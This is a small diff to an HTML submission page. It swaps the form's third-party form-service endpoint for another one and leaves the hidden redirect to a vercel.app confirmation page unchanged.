--- a/submit.html
+++ b/submit.html
@@ -8,7 +8,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/yi9xhvUk0" method="post">
+        <form action="https://submit-form.com/kanyphe6L" method="post">
             <input type="hidden" name="_redirect" value="https://confrim-submission.vercel.app"/>
             <div id="root">
                 <div>
